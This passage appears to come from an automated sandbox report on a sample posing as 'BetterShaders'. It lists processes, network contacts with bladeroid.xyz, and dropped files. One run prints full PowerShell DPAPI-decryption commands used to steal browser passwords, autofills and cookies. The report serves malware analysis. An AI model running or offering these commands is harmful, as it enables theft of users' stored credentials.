| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.179.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240508-en
Max time kernel
132s
Max time network
110s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4812 wrote to memory of 1272 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4812 wrote to memory of 1272 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4812 wrote to memory of 1272 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1272 -ip 1272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1272 -s 628
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 52.111.227.14:443 | tcp | |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win7-20240221-en
Max time kernel
120s
Max time network
123s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 220
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:41
Platform
win10v2004-20240508-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\app-64.7z
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.162.46.104.in-addr.arpa | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240508-en
Max time kernel
151s
Max time network
159s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe | N/A |
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipapi.co | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe
"C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
C:\Windows\system32\taskkill.exe
taskkill /IM msedge.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,0,78,45,1,2,73,101,138,92,248,203,36,214,3,29,227,126,43,5,213,73,178,36,50,196,50,207,115,181,6,197,32,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,219,159,52,176,208,115,13,56,208,151,127,54,129,239,61,201,132,227,174,108,32,71,248,72,155,160,225,38,252,147,203,48,0,0,0,197,0,36,240,9,215,176,156,79,184,233,65,75,233,34,162,148,88,138,202,207,252,36,242,164,230,221,121,165,227,58,204,54,172,208,39,144,191,58,71,214,82,223,125,228,156,102,173,64,0,0,0,231,83,253,134,63,37,150,64,131,136,72,63,218,180,121,158,202,225,25,28,220,224,224,100,212,227,145,186,16,22,203,112,136,253,150,50,127,211,24,206,170,121,22,93,168,43,216,180,15,2,66,106,49,3,52,195,201,207,79,83,68,16,5,250), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,0,78,45,1,2,73,101,138,92,248,203,36,214,3,29,227,126,43,5,213,73,178,36,50,196,50,207,115,181,6,197,32,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,219,159,52,176,208,115,13,56,208,151,127,54,129,239,61,201,132,227,174,108,32,71,248,72,155,160,225,38,252,147,203,48,0,0,0,197,0,36,240,9,215,176,156,79,184,233,65,75,233,34,162,148,88,138,202,207,252,36,242,164,230,221,121,165,227,58,204,54,172,208,39,144,191,58,71,214,82,223,125,228,156,102,173,64,0,0,0,231,83,253,134,63,37,150,64,131,136,72,63,218,180,121,158,202,225,25,28,220,224,224,100,212,227,145,186,16,22,203,112,136,253,150,50,127,211,24,206,170,121,22,93,168,43,216,180,15,2,66,106,49,3,52,195,201,207,79,83,68,16,5,250), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,235,109,63,161,143,103,239,2,243,42,0,152,229,80,171,0,159,246,122,218,102,1,201,41,199,97,231,141,3,106,5,145,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,28,248,39,179,16,168,130,106,211,0,97,0,128,122,38,238,106,157,215,12,26,220,5,94,0,18,197,241,30,209,133,237,48,0,0,0,94,231,22,67,115,230,229,203,231,167,104,218,247,164,4,250,85,64,58,98,170,216,75,184,105,46,36,45,95,94,206,149,65,52,170,185,236,180,195,205,32,56,192,56,21,251,66,54,64,0,0,0,2,83,162,89,41,109,219,141,218,61,37,223,251,2,114,133,242,58,77,7,58,223,102,204,149,171,52,166,22,73,227,39,184,85,13,27,246,113,204,235,52,211,6,50,1,238,240,195,92,174,30,192,214,135,234,206,46,248,21,9,246,215,58,66), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,235,109,63,161,143,103,239,2,243,42,0,152,229,80,171,0,159,246,122,218,102,1,201,41,199,97,231,141,3,106,5,145,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,28,248,39,179,16,168,130,106,211,0,97,0,128,122,38,238,106,157,215,12,26,220,5,94,0,18,197,241,30,209,133,237,48,0,0,0,94,231,22,67,115,230,229,203,231,167,104,218,247,164,4,250,85,64,58,98,170,216,75,184,105,46,36,45,95,94,206,149,65,52,170,185,236,180,195,205,32,56,192,56,21,251,66,54,64,0,0,0,2,83,162,89,41,109,219,141,218,61,37,223,251,2,114,133,242,58,77,7,58,223,102,204,149,171,52,166,22,73,227,39,184,85,13,27,246,113,204,235,52,211,6,50,1,238,240,195,92,174,30,192,214,135,234,206,46,248,21,9,246,215,58,66), $null, 'CurrentUser')
C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe
"C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,9188145920335173270,17345024384858000960,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1920 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe
"C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --field-trial-handle=2140,i,9188145920335173270,17345024384858000960,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:3
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Passwords.txt
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_cookies.zip\Microsoft_Default.txt
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Autofills.txt
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\HideUndo.ram"
C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe
"C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2008,i,9188145920335173270,17345024384858000960,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2516 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bladeroid.xyz | udp |
| US | 8.8.8.8:53 | ipapi.co | udp |
| US | 104.21.23.240:443 | bladeroid.xyz | tcp |
| US | 104.26.8.44:443 | ipapi.co | tcp |
| US | 104.21.23.240:443 | bladeroid.xyz | tcp |
| US | 104.21.23.240:443 | bladeroid.xyz | tcp |
| US | 104.21.23.240:443 | bladeroid.xyz | tcp |
| US | 104.21.23.240:443 | bladeroid.xyz | tcp |
| US | 104.21.23.240:443 | bladeroid.xyz | tcp |
| US | 8.8.8.8:53 | 240.23.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.8.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:443 | dns.google | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\57c9bfb3-4a0d-4cb3-a484-dd0ed82883c5.tmp.node
| MD5 | 3072b68e3c226aff39e6782d025f25a8 |
| SHA1 | cf559196d74fa490ac8ce192db222c9f5c5a006a |
| SHA256 | 7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01 |
| SHA512 | 61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yfafqys2.vmm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1592-14-0x000002D4EB740000-0x000002D4EB762000-memory.dmp
memory/1592-17-0x000002D4EBB40000-0x000002D4EBB90000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f48896adf9a23882050cdff97f610a7f |
| SHA1 | 4c5a610df62834d43f470cae7e851946530e3086 |
| SHA256 | 3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78 |
| SHA512 | 16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 68d80cc2ac40ea9e5c7297fba6623c45 |
| SHA1 | 05908daef7414f753fa6006082c42485002a7da8 |
| SHA256 | 3b059d656dae93233a96c9079352c1d77c6abfec689cc6236b93b427c9918e96 |
| SHA512 | 2c51e963eba030ee4f2ef5df1577a8ce38cacd6ffc3d0c56258db173352b46cd6048505061c65bd5757d14e2e27d9d396cbce95d58406660af62365bd4e7afb6 |
C:\Users\Admin\AppData\Local\Temp\Passwords.txt
| MD5 | 4d6eadc6c0ff2a52aae242512cface64 |
| SHA1 | 58585d6d017a8c2a597d7b88e98825c59f3368c5 |
| SHA256 | d177217ce74775a6fdc5d0880f58da76105315c7bf732892b5e11e19c0175e09 |
| SHA512 | 63fd17a1fec1efb41fce70b6b9130de215c63e1ed58a3169139b21cd32f84804d5fbfde5b76a894d83f2c71f8bf594cd855f823dc16ce984f2f3aec228759f58 |
C:\Users\Admin\AppData\Local\Temp\Autofills.txt
| MD5 | 8fb196cd3b31b00bb8e35df5c490ade1 |
| SHA1 | cf7acf3dde5ba8f808be6025cf28dfe573120307 |
| SHA256 | 969fd23147e88067565018fc4141eed85cd208906a8b878b098defeb4156ebf8 |
| SHA512 | 1c101e51db23045dcaf2edf4e414099c3430951afb9625673197f1d21df7cded2c2bd43e02966571c6910d107a5a04b2461bc030e6babe9343090bf05ca63581 |
memory/3788-65-0x00007FF7020B0000-0x00007FF7021A8000-memory.dmp
memory/3788-66-0x00007FF95B8D0000-0x00007FF95B904000-memory.dmp
memory/3788-75-0x00007FF94B6A0000-0x00007FF94B8AB000-memory.dmp
memory/3788-76-0x00007FF95B700000-0x00007FF95B741000-memory.dmp
memory/3788-77-0x00007FF9478D0000-0x00007FF948980000-memory.dmp
memory/3788-84-0x000002509B900000-0x000002509BA13000-memory.dmp
memory/3788-83-0x00007FF947000000-0x00007FF947035000-memory.dmp
memory/3788-82-0x00007FF94BD20000-0x00007FF94BD31000-memory.dmp
memory/3788-81-0x00007FF94BD40000-0x00007FF94BD51000-memory.dmp
memory/3788-80-0x00007FF951DD0000-0x00007FF951DE1000-memory.dmp
memory/3788-79-0x00007FF951E00000-0x00007FF951E18000-memory.dmp
memory/3788-78-0x00007FF95B610000-0x00007FF95B631000-memory.dmp
memory/3788-73-0x00007FF95B8B0000-0x00007FF95B8CD000-memory.dmp
memory/3788-71-0x00007FF95B9E0000-0x00007FF95B9F7000-memory.dmp
memory/3788-74-0x00007FF95B860000-0x00007FF95B871000-memory.dmp
memory/3788-72-0x00007FF95B9A0000-0x00007FF95B9B1000-memory.dmp
memory/3788-70-0x00007FF95C310000-0x00007FF95C321000-memory.dmp
memory/3788-69-0x00007FF95F410000-0x00007FF95F427000-memory.dmp
memory/3788-67-0x00007FF94B8B0000-0x00007FF94BB66000-memory.dmp
memory/3788-68-0x00007FF95FE90000-0x00007FF95FEA8000-memory.dmp
memory/2592-87-0x00000246B6270000-0x00000246B6271000-memory.dmp
memory/2592-86-0x00000246B6270000-0x00000246B6271000-memory.dmp
memory/2592-85-0x00000246B6270000-0x00000246B6271000-memory.dmp
memory/2592-91-0x00000246B6270000-0x00000246B6271000-memory.dmp
memory/2592-93-0x00000246B6270000-0x00000246B6271000-memory.dmp
memory/2592-97-0x00000246B6270000-0x00000246B6271000-memory.dmp
memory/2592-96-0x00000246B6270000-0x00000246B6271000-memory.dmp
memory/2592-95-0x00000246B6270000-0x00000246B6271000-memory.dmp
memory/2592-94-0x00000246B6270000-0x00000246B6271000-memory.dmp
memory/2592-92-0x00000246B6270000-0x00000246B6271000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240426-en
Max time kernel
147s
Max time network
155s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3dcompiler_47.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240508-en
Max time kernel
146s
Max time network
156s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |